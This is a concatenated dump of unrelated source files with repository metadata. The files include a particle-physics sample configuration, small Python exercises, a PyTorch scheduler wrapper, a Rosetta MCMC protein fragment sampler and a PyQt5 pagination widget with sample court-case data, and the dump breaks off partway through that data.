"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
},
{
'name':"inclusive"
,'in_file_name':"monojet-combo.root"
#,'in_file_name':"inclusive-combo.root"
,"cutstring":"mvamet>200 && mvamet<1000"
,"varstring":["mvamet",200,1000]
,"weightname":"weight"
,"bins":[200.0 , 210.0 , 220.0 , 230.0 , 240.0 , 250.0 , 260.0 , 270.0 , 280.0 , 290.0 , 300.0 , 310.0 , 320.0 , 330.0,340,360,380,420,510,1000]
,"additionalvars":[['jet1pt',25,150,1000]]
,"pdfmodel":0
,"recoilMC" :"recoilfits/recoilfit_Zgj_pfmetraw_2012_mc.root"
,"recoilData":"recoilfits/recoilfit_Zgj_pfmetraw_2012_data.root"
,"muonSF" : 0.985
,"photonSF": 0.97
,"samples":
{ # Format is TreeName : ['region','process',isMC,isSignal] !! Note isSignal means DM/Higgs etc for signal region but Z-jets/W-jets for the di/single-muon regions !!
# Signal Region
"Znunu_signal" :['signal','zjets',1,0]
,"Zll_signal" :['signal','zll',1,0]
,"Wjets_signal" :['signal','wjets',1,0]
,"WW_signal" :['signal','dibosons',1,0]
,"WZ_signal" :['signal','dibosons',1,0]
,"ZZ_signal" :['signal','dibosons',1,0]
,"ttbar_signal" :['signal','top',1,0]
,"SingleTop_signal" :['signal','top',1,0]
,"QCD_signal" :['signal','qcd',1,0]
,"ggH125_signal" :['signal','ggH',1,1]
,"VBFH125_signal" :['signal','vbf',1,1]
,"WH125_signal" :['signal','wh',1,1]
,"ZH125_signal" :['signal','zh',1,1]
#,"GV_signal" :['signal','gv',1,0]
,"data_signal" :['signal','data',0,0]
# Di muon-Control
,"Zll_di_muon_control" :['dimuon','zll',1,1]
,"Znunu_di_muon_control" :['dimuon','zjets',1,0]
,"Wjets_di_muon_control" :['dimuon','wjets',1,0]
,"WW_di_muon_control" :['dimuon','dibosons',1,0]
,"WZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ZZ_di_muon_control" :['dimuon','dibosons',1,0]
,"ttbar_di_muon_control" :['dimuon','top',1,0]
,"SingleTop_di_muon_control" :['dimuon','top',1,0]
#,"QCD_di_muon_control" :['dimuon','qcd',1,0]
#,"GV_di_muon_control" :['dimuon','gv',1,0]
,"data_di_muon_control" :['dimuon','data',0,0]
# Single muon control
,"Zll_single_muon_control" :['singlemuon','zll',1,0]
#,"Znunu_single_muon_control" :['singlemuon','zjets',1,0]
,"Wjets_single_muon_control" :['singlemuon','wjets',1,1]
,"ZZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"WW_single_muon_control" :['singlemuon','dibosons',1,0]
,"WZ_single_muon_control" :['singlemuon','dibosons',1,0]
,"SingleTop_single_muon_control" :['singlemuon','top',1,0]
,"ttbar_single_muon_control" :['singlemuon','top',1,0]
,"QCD_single_muon_control" :['singlemuon','qcd',1,0]
#,"GV_single_muon_control" :['singlemuon','gv',1,0]
,"data_single_muon_control" :['singlemuon','data',0,0]
,"data_photon_control" :['photon','data',0,0]
,"Photon_photon_control" :['photon','gjet',1,1]
,"Zll_photon_control" :['photon','zll',1,0]
,"Wjets_photon_control" :['photon','wjets',1,0]
,"WW_photon_control" :['photon','dibosons',1,0]
,"ZZ_photon_control" :['photon','dibosons',1,0]
,"ttbar_photon_control" :['photon','top',1,0]
,"SingleTop_photon_control" :['photon','top',1,0]
,"QCD_photon_control" :['photon','qcd',1,0]
},
"metsamples":
{
#Di Muon Control Region
"Zll_di_muon_control","Znunu_di_muon_control","Wjets_di_muon_control","WW_di_muon_control","WZ_di_muon_control","ZZ_di_muon_control",
"ttbar_di_muon_control","SingleTop_di_muon_control",
#Single Muon Control Region
"Wjets_single_muon_control","Zll_single_muon_control","WW_single_muon_control","WZ_single_muon_control","ZZ_single_muon_control","ttbar_single_muon_control",
"SingleTop_single_muon_control",
#Photon Control Region
"Photon_photon_control","Wjets_photon_control","Zll_photon_control","WW_photon_control","ZZ_photon_control","ttbar_photon_control","SingleTop_photon_control",
"QCD_photon_control",
#Signal Region
"Wjets_signal","Zll_signal","WW_signal","WZ_signal","ZZ_signal","ttbar_signal","SingleTop_signal","QCD_signal",
"ggH125_signal" ,"VBFH125_signal" ,"WH125_signal" ,"ZH125_signal","Znunu_signal"
},
}
]
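# Illustrative note: per the format comment above, a "samples" entry unpacks as
#   region, process, isMC, isSignal = samples["Wjets_signal"]   # -> ('signal', 'wjets', 1, 0)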
|
[
"Phil@pb-d-128-141-150-9.cern.ch"
] |
Phil@pb-d-128-141-150-9.cern.ch
|
844f98281de04f478b910610b2b109cddd3c8b53
|
e9969129cd3622c1a5be06216b88ef2cce3cb5d5
|
/old-kata-backup/count_no_of_digit.py
|
b25cc18d102f6be28f5f7a2391570a3c23cd3087
|
[] |
no_license
|
Kalaiyarazan/code_kata
|
f8ce2afb29adf112d9b50a1371a656f2c186988b
|
532327b7d412565441a329f8f2c7de2362d1a68a
|
refs/heads/master
| 2020-07-26T17:40:45.181350
| 2019-11-03T17:34:26
| 2019-11-03T17:34:26
| 208,722,306
| 0
| 1
| null | 2019-11-03T17:23:40
| 2019-09-16T06:06:06
|
Python
|
UTF-8
|
Python
| false
| false
| 33
|
py
|
xyz = input()  # input() already returns a str; len() counts its characters
print(len(xyz))
|
[
"kalaiyarazan.v@gmail.com"
] |
kalaiyarazan.v@gmail.com
|
556bd1178bb1f303a3bdf90522bf60abc26e0877
|
11b5bd6806447a9b2ef4d8d54a9dc64c8be5d6e5
|
/src/optimizers/schedulers/multiplicative_lr.py
|
416d6d20f06bafe37335a66d375ada4e92b29f45
|
[] |
no_license
|
milySW/NNResearchAPI
|
0789478791a91002d79dd909fe5f9654deeb4b44
|
00bbea4909d1272f80455edb692b45c6c6d56831
|
refs/heads/master
| 2023-04-17T19:56:19.667177
| 2021-05-03T23:48:26
| 2021-05-03T23:48:26
| 291,540,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 325
|
py
|
from torch.optim.lr_scheduler import MultiplicativeLR as TorchMultiplicativeLR
from src.base.scheduler import BaseScheduler
class MultiplicativeLR(BaseScheduler, TorchMultiplicativeLR):
__doc__ = TorchMultiplicativeLR.__doc__
def __init__(self, optimizer, **kwargs):
super().__init__(optimizer, **kwargs)
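# Illustrative usage sketch (assumptions: `model` is any torch nn.Module and
# BaseScheduler passes kwargs straight through to the torch scheduler):
#   import torch
#   opt = torch.optim.SGD(model.parameters(), lr=0.1)
#   sched = MultiplicativeLR(opt, lr_lambda=lambda epoch: 0.95)  # lr *= 0.95 on each step()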
|
[
"gajowczyk.milosz@gmail.com"
] |
gajowczyk.milosz@gmail.com
|
eafc3e3e7bd5e21ff2097a00bdaa5451de58476b
|
fcdb69b396258c1e3105dbfe1fcd50cc73f7b8cf
|
/Digite3numeros.py
|
79bd3cf1b848415c3edc20bc3da0e501db723940
|
[] |
no_license
|
l0rennareis/Algoritmo
|
6b7147be1bb21e084c0ccfcc77d61cedd93e13fe
|
f73a1cbc0ab773b755d756cc2bf8e5cc758a50b4
|
refs/heads/master
| 2021-03-19T07:25:50.806907
| 2017-06-23T22:50:13
| 2017-06-23T22:50:13
| 94,377,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 370
|
py
|
# Read three numbers and print them in ascending order
n1 = int(input("enter a number: "))
n2 = int(input("enter a number: "))
n3 = int(input("enter a number: "))
print(n1)
print(n2)
print(n3)
if n1 > n2 > n3:
    print(n3, n2, n1)
elif n1 > n3 > n2:
    print(n2, n3, n1)
elif n2 > n1 > n3:
    print(n3, n1, n2)
elif n2 > n3 > n1:
    print(n1, n3, n2)
elif n3 > n2 > n1:
    print(n1, n2, n3)
elif n3 > n1 > n2:
    print(n2, n1, n3)  # was print(n3, n2, n1), which is not ascending when n3 > n1 > n2
|
[
"noreply@github.com"
] |
l0rennareis.noreply@github.com
|
31c17d7e820daed91a22a6e437066125b32441a3
|
a3f206af3878e2fff0437863a5c0d2d800295814
|
/solutions/prob11650/solution_python.py
|
f199e1e2d76515db507a12104bfc50658824c8ae
|
[] |
no_license
|
soarhigh03/baekjoon-solutions
|
0cdcec30825a00074a982b380ae2f2ddee5e3f54
|
8161cdda184e4e354be4eafe2b4fa2bd48635fa4
|
refs/heads/master
| 2023-01-04T10:42:32.882285
| 2020-10-24T02:20:48
| 2020-10-24T02:20:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
"""
Baekjoon Online Judge #11650
https://www.acmicpc.net/problem/11650
"""
N = int(input())
points = []
for _ in range(N):
point = tuple(map(int, input().split()))
points.append(point)
points.sort()
for point in points:
print(point[0], point[1])
|
[
"loop.infinitely@gmail.com"
] |
loop.infinitely@gmail.com
|
43d8be24a71967b0f1da893e4c205887492daccf
|
a0ba44f11c7744f94293cc87bc794e99174374c5
|
/src/astro/__init__.py
|
e424d9348777991dfcc98d7b07d3e9bc0e0ecc3c
|
[] |
no_license
|
srswinde/astro
|
2d1fec6c6c51935a97c3da07c7cb00359975fc6b
|
bbd46e741bdc543ce5862dd7f36d0952c43e5ac7
|
refs/heads/master
| 2021-01-20T14:49:52.840690
| 2018-05-30T05:16:24
| 2018-05-30T05:16:24
| 90,679,111
| 0
| 0
| null | 2018-10-31T20:30:17
| 2017-05-08T22:47:01
|
Python
|
UTF-8
|
Python
| false
| false
| 123
|
py
|
from angles import Hour_angle, RA_angle, Dec_angle, Deg10, Angle
import time
import math
from astrolib2 import starDate
|
[
"scott@mogit.as.arizona.edu"
] |
scott@mogit.as.arizona.edu
|
80f852a7e4f8ac5b6c722e26b343afb62a37c251
|
e18336fcffd73131e9a51c0b5b81fcaa7353489b
|
/jojojo.py
|
8c842b4c379a5cf588317300edae02b0d634bfc2
|
[] |
no_license
|
Dopamine101/Prepro
|
0603f66be24159016f66c06dcfefe18c5afa3d7d
|
168475b2337a08e0a8ccbc97e66a716fb3a42e92
|
refs/heads/main
| 2023-06-12T04:12:32.359695
| 2021-07-05T11:06:39
| 2021-07-05T11:06:39
| 383,110,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
"""Broken heart boy"""
def date():
"""print"""
toom = input()
ivayne = int(input())
sees = toom+"\n"
print(sees * ivayne)
date()
|
[
"noreply@github.com"
] |
Dopamine101.noreply@github.com
|
178eb8eb639adbbf17d5a555b08e90e92ba2b6d8
|
f0141f1b4bbf4555fcf96d2a297e2e3d61855e35
|
/model/parameters.py
|
35e0a1d64e0493fbead6457d977e6f4a709cc709
|
[
"MIT"
] |
permissive
|
JakartaLaw/bayesianfactormodel
|
b286b00d05edfc780cd2c31f25aad9363d7c2e39
|
0a75412d965ae2ed5c093315cb27f82d4a578590
|
refs/heads/master
| 2020-04-07T07:49:51.835924
| 2018-11-29T17:02:19
| 2018-11-29T17:02:19
| 158,190,409
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,986
|
py
|
import numpy as np
import pandas as pd
from collections import defaultdict
from model.parameterframe import ParameterFrame
from model.plotter import Plotter
class Parameters(Plotter):
def __init__(self, trace_df):
super().__init__(trace_df)
    @property
    def k(self):
        p, k = self.get_dimensions()
        return k
    @property
    def p(self):
        p, k = self.get_dimensions()
        return p
def _calc_param_mean_dict(self, skip_obs=None):
try:
self._calc_helper_param_mean_dict(skip_obs=skip_obs)
except AttributeError:
self._calc_param_trace_dict()
self._calc_helper_param_mean_dict(skip_obs=skip_obs)
def _calc_helper_param_mean_dict(self, skip_obs):
self.param_mean_dict = dict()
for param_name in self.trace_df.columns:
param_obs = self.trace_df[param_name][skip_obs:]
self.param_mean_dict[param_name] = np.mean(param_obs)
def params_to_df(self):
params_unordered = self._convert_to_dimension_dict()
params_ordered = self._order_to_df(params_unordered)
return pd.DataFrame(params_ordered)
def _convert_to_dimension_dict(self):
#self.k, self.p
param_to_df_unordered = defaultdict(list)
for param_name, param_val in self.param_mean_dict.items():
(d1, d2) = self._decompose_column_index(param_name)
param_to_df_unordered[d2].append((d1, param_val))
return param_to_df_unordered
def _order_to_df(self, param_to_df_unordered):
params_to_df = dict()
for key, tup_list in param_to_df_unordered.items():
params_to_df[key] = self._return_ordered_by_index_params(tup_list)
return params_to_df
@staticmethod
def _return_ordered_by_index_params(tup_list):
def sorter(tup): return tup[0]
tup_list.sort(key=sorter)
return [tup[1] for tup in tup_list]
|
[
"Jeppe@Jeppes-MacBook-Pro.local"
] |
Jeppe@Jeppes-MacBook-Pro.local
|
e76767b8387ac2db7f8fa709a10ce6fac53354c9
|
c202e9185995d9bf2d8ae4dc5ec054ae1c481901
|
/Project 3/code/FragmentSampler.py
|
f51f431d19f1fc030cce31e2420c03560e84f6fb
|
[] |
no_license
|
terryli710/BEIOMEDIN214
|
a48ba30689f2a78a81d1b47f7a1fdce1048c2b62
|
aecec061d2194748da5204d56a55b6def9642f9f
|
refs/heads/master
| 2023-01-24T10:44:13.188814
| 2020-11-29T04:25:48
| 2020-11-29T04:25:48
| 296,722,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,041
|
py
|
"""
This file contains the main fragment sampling class, which performs a Monte Carlo simulated annealing procedure to fold a protein.
"""
from pyrosetta import *
init(extra_options='-mute all -constant_seed')
from Bio.SeqIO import parse
import math
import utils
from Protein import Protein
from FragmentSet import FragmentSet
from typing import Union, Tuple
import os
import random
class MCMCSampler(object):
def __init__(self, fasta: str, logdir: str = None, start_pdb: Union[str, None] = None, sample_size=50,
annealing_rate=0.999):
"""
Initializing a MCMC sampler for certain protein
The score function is given to you (Rosetta centroid score function)
:param fasta: name fasta file
:param sample_size: size of candidate fragments in each position
attributes:
scorefxn: score function, callable
target_pose: goal pose, rosetta pose object
protein: Protein class
fragment_set: FragmentSet class
self.candidate_frag: store calculated candidate fragments
self.mers: k-mer
self.temp: current temperature
self.t_end: set ending temperature
"""
## 0
# set log
self.logdir = logdir
## 1
# set score function
self.scorefxn = create_score_function('score3')
## 2
# read pdb file (goal position)
# pose_from_pdb doesn't take absolute dir
self.protein_name = fasta.split('.')[0]
self.target_pose = pose_from_pdb(self.protein_name + '.pdb')
## 3
# read fasta file (protein)
fasta_path = os.path.join(self.protein_name + '.fasta')
        records = parse(fasta_path, 'fasta')  # avoid shadowing the builtin iter()
        seq = next(records)
# initialize protein, either from seq or from start_pdb
if start_pdb:
os.chdir(os.path.dirname(start_pdb))
self.protein = Protein(pose=pose_from_pdb(os.path.basename(start_pdb)))
else:
self.protein = Protein(sequence=seq.seq._data)
# store initial pdb
self.initial_protein = Protein(sequence=seq.seq._data)
## 4
# get fragment set
self.fragment_set = {"9mers": FragmentSet(os.path.join(self.protein_name + "_9mers.frag"),
os.path.join(self.protein_name + "_9mers.rmsd")),
"3mers": FragmentSet(os.path.join(self.protein_name + "_3mers.frag"),
os.path.join(self.protein_name + "_3mers.rmsd"))}
## 5
# parametrize candidate_frag_dict
self.candidate_frag = {"9mers": {}, "3mers": {}}
for pos in range(1, self.fragment_set["9mers"].length + 1):
self.candidate_frag["9mers"][pos] = self.fragment_set["9mers"].get_lowRMS_fragments(pos, sample_size)
for pos in range(1, self.fragment_set["3mers"].length + 1):
self.candidate_frag["3mers"][pos] = self.fragment_set["3mers"].get_lowRMS_fragments(pos, sample_size)
## 6
# set temperature
self.temp = 100
self.t_end = 0.1
## 7
# set anneal rate
self.annealing_rate = annealing_rate
return
def compute_energy(self, protein: Union[Protein, None] = None) -> float:
"""
compute energy of protein.
Hint: look at utils.py
--------
Params:
- protein (Protein object): protein to score
Return:
- energy of conformation (float)
"""
# NOTE: score_pose cannot take absolute directory
if protein:
return utils.score_pose(protein.pose, self.scorefxn)
else:
return utils.score_pose(self.protein.pose, self.scorefxn)
def perturb_fragment(self, pos: int, mer: str = "9mers",
protein: Union[Protein, None] = None) -> Tuple[
Protein, int]: # you may want to add more arguments
"""
Sample from possible fragments for a position, and replace torsion angles of that fragment in the protein.
Store fragment candidate at certain position (call get_lowRMS just once.)
:param protein: optional parameter, if none, use self.protein
:param pos: position to change
:param mer: mode of function, either "3mers" or "9mers"
:return: new Protein with updated angles
"""
# set a new_pose (protein)
if not protein:
new_protein = Protein(pose=self.protein.pose)
else:
new_protein = Protein(pose=protein.pose)
# sample candidate fragment
random_index = random.randint(0, len(self.candidate_frag[mer][pos]) - 1)
frag_chosen = self.candidate_frag[mer][pos][random_index]
frag_index = self.fragment_set[mer].findFragIndex(pos, frag_chosen)
# insert this fragment and return
if mer == "9mers":
frag_length = 9
else:
frag_length = 3
for i in range(frag_length):
new_protein.set_torsion(pos + i, frag_chosen[i][0], frag_chosen[i][1])
return new_protein, frag_index
def metropolis_accept(self, new_protein: Protein) -> float: # you may want to add more arguments
"""
Calculate probability of accepting or rejecting move based on Metropolis criterion.
:param new_protein: candidate protein to be calculated and compared
:return: probability of accepting
"""
delta_e = self.compute_energy(new_protein) - self.compute_energy()
# formula: if delta_E > 0: exp(-delta_E/kT)
return math.exp(-delta_e / self.temp) if delta_e > 0 else 1
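    # Worked example (illustrative): at temp=100, an uphill move of delta_e=50
    # is accepted with probability exp(-50/100) = exp(-0.5) ≈ 0.61; downhill
    # moves (delta_e <= 0) are always accepted.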
def anneal_temp(self) -> bool:
"""
Anneal temperature using exponential annealing schedule.
Consider kT to be a single variable (i.e. ignore Boltzmann constant)
:return whether it reached the threshold
"""
assert self.temp > self.t_end, "Temperature has reached threshold"
self.temp *= self.annealing_rate
if self.temp <= self.t_end:
return True
else:
return False
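    # Worked example (illustrative): with temp=100, t_end=0.1 and
    # annealing_rate=0.999, the threshold is crossed after roughly
    # ln(100/0.1) / -ln(0.999) = ln(1000)/0.001 ≈ 6900 accepted moves.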
def step(self, verbose=0) -> bool:
"""
Take a single MCMC step. Each step should do the following:
1. sample position in chain
- Note: think about positions you can sample a k-mer fragment from.
For example, you cannot sample from position 1 because there is no phi angle
2. sample fragment at that position and replace torsions in a *copied version* of the protein
3. measure energy after replacing fragment
4. accept or reject based on Metropolis criterion
- if accept: incorporate proposed insertion and anneal temperature
            - if reject: sample new fragment (go to step 2)
"""
accept = 0
i = 0
done = False
if self.temp > 1:
mer_str = "9mers"
else:
mer_str = "3mers"
# 1. sample position in chain (e.g. len=10, 3-mers, should sample {1,...,7})
sampled_pos = random.randint(1, self.fragment_set[mer_str].length)
# get number of frag in this position
pool_size = len(self.candidate_frag[mer_str][sampled_pos])
sampled_set = set()
# if accepted or sampled all frags and cannot decide, keep going
while not accept and len(sampled_set) < pool_size:
# 2. replace torsions in a *copied version* of the protein
new_protein, index = self.perturb_fragment(sampled_pos, mer=mer_str)
# add to set
sampled_set.add(index)
# 3. 4. measure energy and decide
prob = self.metropolis_accept(new_protein)
accept = random.uniform(0, 1) < prob
if accept:
# incorporate proposed insertion and anneal temperature
self.protein = new_protein
done = self.anneal_temp()
# if reject: sample new fragment (go to step 2)
i += 1
if verbose:
if accept:
print("sampled position = {}, take {} iter to finish, prob is {}".format(sampled_pos, i, prob))
elif len(sampled_set) == pool_size:
print("sampled position = {}, didn't accept any frags".format(sampled_pos))
return done
def savelog(self, log: dict, file_name: str) -> None:
"""
save log of sim
:param log: log information
:param file_name: saved path
"""
saved_log = "iteration" + "\t" + "\t".join(log.keys()) + "\n"
iter = 1
for row in range(len(log["energy"])):
saved_log += str(iter) + "\t"
saved_log += "\t".join(str(log[key][iter - 1]) for key in log.keys())
saved_log += "\n"
iter += 1
with open(file_name, "w") as f:
f.write(saved_log)
def storeSim(self, best_pdb: Protein, log: dict, sim_index: int) -> Tuple[str, str, int]:
"""
Store best pdb and log text file to log
:param best_pdb: the structure to store as "best.pdb"
:param log: log dict to store
:param sim_index: int of simulation number
:return path to sim folder, path to log folder, sim
"""
# dealing with paths
if not self.logdir:
cur_dir = os.getcwd()
log_folder_name = self.protein_name + "_log"
log_folder_path = os.path.join(cur_dir, log_folder_name)
else:
log_folder_path = self.logdir
if not os.path.exists(log_folder_path):
os.mkdir(log_folder_path)
sim_folder_name = "sim_" + self.__toStr__(sim_index)
sim_folder_path = os.path.join(log_folder_path, sim_folder_name)
# avoid path exist error
if not os.path.exists(sim_folder_path):
os.mkdir(sim_folder_path)
# store things
# 1. initial pdb
self.initial_protein.save_pdb(os.path.join(sim_folder_path, "initial.pdb"))
# 2. target pdb
target_protein = Protein(pose=self.target_pose)
target_protein.save_pdb(os.path.join(sim_folder_path, "target.pdb"))
# 3. best pdb
best_pdb.save_pdb(os.path.join(sim_folder_path, "best.pdb"))
# 6. log.txt
self.savelog(log, os.path.join(sim_folder_path, sim_folder_name + "_log.txt"))
return sim_folder_path, log_folder_path, sim_index
@staticmethod
def __toStr__(integer) -> str:
"""
convert integer to formatted string
:param integer: integer to be converted
:return: string
"""
if integer < 10:
return "0" + str(integer)
else:
return str(integer)
def simulate(self, sim_index: int, seed: int = 9001) -> Tuple[int, float, float]:
"""
Run full MCMC simulation from start_temp to end_temp.
Be sure to save the best (lowest-energy) structure, so you can access it after.
It is also a good idea to track certain variables during the simulation (temp, energy, and more).
:param sim_index: simulation index
:param seed: int
:return: log information
"""
random.seed(seed)
log = {"temperature": [], "energy": []}
while True:
if self.step():
# store best pdb
sim_path, log_folder_path, sim_index = self.storeSim(self.protein, log, sim_index)
# calculate relaxed, cd to the folder!!
cur_dir = os.getcwd()
os.chdir(sim_path)
protein, rmsd, score = utils.relax("best.pdb",
"target.pdb")
os.chdir(cur_dir)
break
else:
# keep track of log
log['temperature'].append(self.temp)
log['energy'].append(self.compute_energy())
return sim_index, score, rmsd
|
[
"li.terry710@gmail.com"
] |
li.terry710@gmail.com
|
96b0c3d56f99985a786d35c32dcd60fc90857ec2
|
41bb733fd028a62961d516847cf9bc4fecc400d8
|
/Pagination/PageView.py
|
899012f54e7f70ce61c9600dfa191af20ce62f11
|
[] |
no_license
|
TcMysunshine/PyQtExample
|
696ac823024d739cf85bd9a4dd7d3de09dd54f3d
|
cfda8a5fd0cf201c9ba0691562bd9a8eb97f791f
|
refs/heads/master
| 2020-04-01T23:04:18.781429
| 2018-10-25T01:44:29
| 2018-10-25T01:44:29
| 153,740,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,252
|
py
|
import sys
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import QtCore
from PyQt5.QtGui import *
import math
class PageView(QWidget):
def __init__(self, data, titles, keys, dataRow=10, dataCol=4):
super(PageView, self).__init__()
self.resize(960, 790)
        # current page number
        self.currentPage = 1
        # number of columns
        self.dataCol = dataCol
        # rows of data shown per page
        self.dataRow = dataRow
        # height
        self.height = self.dataRow * 70
        # title for each column
        self.titles = titles
        self.titles.append("操作")
        # keys into the data
        self.keys = keys
        # full dataset
        self.data = data
        # length of the data
        self.length = len(data)
        # number of pages the data splits into
        # math.ceil rounds up; a plain / would give a float
        self.pageNum = math.ceil(self.length / self.dataRow)
        # print(str(self.length) + ":" + str(self.dataRow)+":"+str(self.pageNum))
        # build the UI
self.setUpUI()
def setUpUI(self):
        # previous-page button
        self.preButton = QPushButton("上一页", self)
        self.preButton.setGeometry(QtCore.QRect(800, self.height + 10, 50, 20))
        self.preButton.clicked.connect(self.backToLastPage)
        # next-page button
        self.nextButton = QPushButton("下一页", self)
        self.nextButton.setGeometry(QtCore.QRect(860, self.height + 10, 50, 20))
        self.nextButton.clicked.connect(self.forwardToNextPage)
        # total page count
        self.totalPageLabel = QLabel(self)
        self.totalPageLabel.setGeometry(QtCore.QRect(640, self.height + 10, 60, 20))
        self.totalPageLabel.setText("总共" + str(self.pageNum) + "页")
        # current page
        self.currentPageLabel = QLabel(self)
        self.currentPageLabel.setGeometry(QtCore.QRect(700, self.height + 10, 60, 20))
        self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
        # "go to page N" controls
self.label1 = QLabel(self)
self.label1.setGeometry(QtCore.QRect(760, self.height + 40, 40, 20))
self.label1.setText("转到第")
self.turnToPage = QLineEdit(self)
self.turnToPage.setGeometry(QtCore.QRect(805, self.height + 40, 20, 20))
self.turnToPage.setText(str(self.currentPage))
        # "page" suffix label
        self.label1 = QLabel(self)
        self.label1.setGeometry(QtCore.QRect(825, self.height + 40, 20, 20))
        self.label1.setText("页")
        # jump to the requested page
        self.targetPageButton = QPushButton("Go", self)
        self.targetPageButton.setGeometry(QtCore.QRect(860, self.height + 40, 50, 20))
        self.targetPageButton.clicked.connect(self.goToTargetPage)
        # layout
self.layoutWidget = QWidget(self)
self.layoutWidget.setGeometry(QtCore.QRect(0, 0, 950, self.height))
self.layout = QVBoxLayout(self.layoutWidget)
    # go back one page
def backToLastPage(self):
# print("previous")
self.currentPage -= 1
if self.currentPage <= 0:
# print("到达第一页")
QMessageBox.warning(self, "提示", "当前已是第一页")
self.currentPage = 1
else:
self.layout.removeWidget(self.tableView)
# self.model.clear()
# self.tableView.reset()
# self.model.removeRows(0, 5)
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
    # advance one page
def forwardToNextPage(self):
# print("next")
self.currentPage += 1
        # already at the last page
if self.currentPage >= self.pageNum + 1:
QMessageBox.warning(self, "提示", "当前已到达最后一页")
self.currentPage = self.pageNum
else:
self.layout.removeWidget(self.tableView)
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
    # jump to a specific page
def goToTargetPage(self):
self.turnToPageValue = int(self.turnToPage.text())
if self.turnToPageValue > self.pageNum or self.turnToPageValue < 1:
QMessageBox.warning(self, "提示", "指定页不存在,超出范围")
else:
self.layout.removeWidget(self.tableView)
self.currentPage = self.turnToPageValue
# self.model.clear()
self.renderData()
self.currentPageLabel.setText("当前第" + str(self.currentPage) + "页")
def renderData(self):
        # fetch the slice of data to render
        self.setCurrentData()
        # row count on the current page
        rowNum = len(self.currentData)
        self.model = QStandardItemModel(rowNum, self.dataCol + 1)
        # set the header labels
self.model.setHorizontalHeaderLabels(self.titles)
self.tableView = QTableView(self.layoutWidget)
# height = self.dataRow * 35
self.tableView.resize(950, self.height + 200)
self.tableView.verticalHeader().setDefaultSectionSize(62)
self.tableView.setColumnWidth(1, 350)
        # fill in the data
for row in range(rowNum):
for col in range(self.dataCol):
tempValue = self.currentData[row][self.keys[col]]
if col > 1:
value = str(tempValue)[0:10]
else:
value = str(tempValue)
item = QStandardItem(value)
                # center the text
                item.setTextAlignment(Qt.AlignCenter)
                # not editable
item.setEditable(False)
self.model.setItem(row, col, item)
        # bind the model to the view
        self.tableView.setModel(self.model)
        # stretch the last horizontal section to fill the remaining table width
        self.tableView.horizontalHeader().setStretchLastSection(True)
        # stretch all columns horizontally to an appropriate size
        self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
        # add the action buttons
for buttonRow in range(rowNum):
index = self.model.index(buttonRow, self.dataCol)
self.tableView.setIndexWidget(index, self.buttonForRow(self.currentData[buttonRow]['ajxh']))
self.layout.addWidget(self.tableView)
    # clicking the view button passes the case id (ajxh)
    def viewTable(self, id):
        print(id)
    # add a button inside a table row
    def buttonForRow(self, id):
        widget = QWidget()
        # view button
viewBtn = QPushButton('查看')
viewBtn.setStyleSheet(''' text-align : center;
background-color : DarkSeaGreen;
height : 30px;
border-style: outset;
font : 13px; ''')
        # wrap in a lambda to pass an argument to the slot
        viewBtn.clicked.connect(lambda: self.viewTable(id))
        # layout
hLayout = QHBoxLayout()
hLayout.addWidget(viewBtn)
hLayout.setContentsMargins(5, 2, 5, 2)
widget.setLayout(hLayout)
return widget
    # render the data into the table
# def renderTable(self):
# self.tableView = QTableView(self)
# # height = self.dataRow * 35
# self.tableView.resize(750, self.height)
# self.tableView.setModel(self.model)
    # # stretch the last horizontal section to fill the remaining table width
    # self.tableView.horizontalHeader().setStretchLastSection(True)
    # # # stretch all columns horizontally to an appropriate size
# self.tableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# self.tableView.se
# self.layout.addWidget(self.tableView)
# self.vlayout = QHBoxLayout()
# self.layout.addWidget(self.vlayout)
    # select the slice of data to display
def setCurrentData(self):
start = (self.currentPage - 1) * self.dataRow
end = self.currentPage * self.dataRow
        # last page
if self.currentPage == self.pageNum:
self.currentData = self.data[start:self.length]
elif self.currentPage < self.pageNum:
self.currentData = self.data[start:end]
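# Worked example (illustrative): with 21 rows and dataRow=10, pageNum = ceil(21/10) = 3;
# page 1 -> data[0:10], page 2 -> data[10:20], and the last page -> data[20:21].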
if __name__ == '__main__':
app = QApplication(sys.argv)
data = {
"succeed": True,
"message": None,
"object": [
{
"ajxh": 62578,
"ah": "(2018)津民申646号",
"ajmc": "天津市润辉建筑发展有限公司与王作录建设工程分包合同纠纷",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
"baspt": "06 ",
"larq": "2018-02-05T16:00:00.000+0000",
"jarq": "2018-04-23T08:16:04.000+0000"
},
{
"ajxh": 62479,
"ah": "(2018)津民终83号",
"ajmc": "陕西瑞中贸易有限公司,天津京铁火车头足球俱乐部有限公司不当得利纠纷",
"ajxz": "2",
"spcx": "2",
"spcxdz": "29",
"baspt": "06 ",
"larq": "2018-01-29T16:00:00.000+0000",
"jarq": "2018-07-26T09:28:27.000+0000"
},
{
"ajxh": 62376,
"ah": "(2018)津民申583号",
"ajmc": "张树强与南开大学人事争议",
"ajxz": "2",
"spcx": "3",
"spcxdz": "2",
